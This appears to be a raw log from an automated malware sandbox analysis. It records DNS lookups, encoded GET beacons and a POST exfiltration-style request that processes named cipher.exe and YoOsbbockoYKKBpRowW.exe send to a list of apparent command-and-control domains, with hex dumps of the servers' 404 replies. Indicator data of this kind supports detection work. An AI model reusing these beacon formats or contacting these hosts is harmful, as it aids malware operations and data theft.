Source: global traffic HTTP traffic detected: GET /2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy+Rs8D5dDCYTlmhW0rahL5OEPHZ4qZwnhHQRjdmYMWg8iT8fZssjRHm0dm/kqluwDPMT77mKIBha7fxwQW4MO+4PevzRBPSWs= HTTP/1.1Host: www.fruitique.co.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /klk7/?FNPd=9dP0BDeQOeIgUtwHisb4+HhriuuC7aFbTiKeAEdqL4fJM7qIcfT3xserNr/6IBhXmDc0Se+gIKMrWWn6otGBJpYMdUchDVG2Mcac25kobj2gW5aJo9JvfS7IA0chOZVsE0AwxR4=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.isrninjas.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /88o1/?FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.emgeecontracting.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: www.emgeecontracting.shop
Source: global traffic DNS traffic detected: DNS query: www.upshercode.store
Source: global traffic DNS traffic detected: DNS query: www.botcsllc.com
Source: global traffic DNS traffic detected: DNS query: www.darkerberrycoffee.com
Source: global traffic DNS traffic detected: DNS query: www.featurasandals.com
Source: global traffic DNS traffic detected: DNS query: www.anoldshow.top
Source: global traffic DNS traffic detected: DNS query: www.badcopsinyourtown.info
Source: global traffic DNS traffic detected: DNS query: www.autonomyai.xyz
Source: global traffic DNS traffic detected: DNS query: www.brzuszkiewicz.pl
Source: global traffic DNS traffic detected: DNS query: www.novosti-dubai.ru
Source: global traffic DNS traffic detected: DNS query: www.ilodezu.com
Source: global traffic DNS traffic detected: DNS query: www.kubanci.ru
Source: global traffic DNS traffic detected: DNS query: www.dvizhenie-pallet.ru
Source: global traffic DNS traffic detected: DNS query: www.szandraromanovics.hu
Source: global traffic DNS traffic detected: DNS query: www.fruitique.co.uk
Source: global traffic DNS traffic detected: DNS query: www.isrninjas.com
Source: unknown HTTP traffic detected: POST /x98j/ HTTP/1.1Host: www.upshercode.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brContent-Length: 209Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.upshercode.storeReferer: http://www.upshercode.store/x98j/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoData Raw: 46 4e 50 64 3d 6e 68 5a 35 4a 31 68 63 49 48 72 4b 59 63 6e 43 69 64 73 53 6c 50 4e 31 68 46 6e 64 39 34 6f 57 59 54 71 34 78 58 2f 78 34 55 5a 43 6b 6f 2f 37 38 6d 72 33 49 6f 2b 56 73 63 6e 35 62 62 46 69 54 43 77 39 38 54 39 67 55 34 78 55 42 2b 45 37 79 71 4d 34 51 56 73 4a 4d 76 62 74 2b 30 45 35 79 6e 49 77 38 63 43 51 35 68 77 6f 63 6e 6b 61 39 53 53 41 6b 6a 6e 45 54 77 56 32 7a 52 77 4f 4d 47 67 57 41 63 73 35 51 33 74 6a 38 61 4d 2b 78 5a 6e 35 4c 6f 52 4a 78 67 41 6c 58 61 47 45 31 4d 59 34 62 56 71 4d 6e 53 72 49 43 46 41 34 57 72 33 34 67 72 6d 39 77 4b 42 44 6b 77 68 77 76 69 55 31 7a 4e 6e 4b 72 62 4b 42 Data Ascii: FNPd=nhZ5J1hcIHrKYcnCidsSlPN1hFnd94oWYTq4xX/x4UZCko/78mr3Io+Vscn5bbFiTCw98T9gU4xUB+E7yqM4QVsJMvbt+0E5ynIw8cCQ5hwocnka9SSAkjnETwV2zRwOMGgWAcs5Q3tj8aM+xZn5LoRJxgAlXaGE1MY4bVqMnSrICFA4Wr34grm9wKBDkwhwviU1zNnKrbKB
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 23 May 2024 13:18:50 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:19:06 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:19:08 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:19:11 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:19:14 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 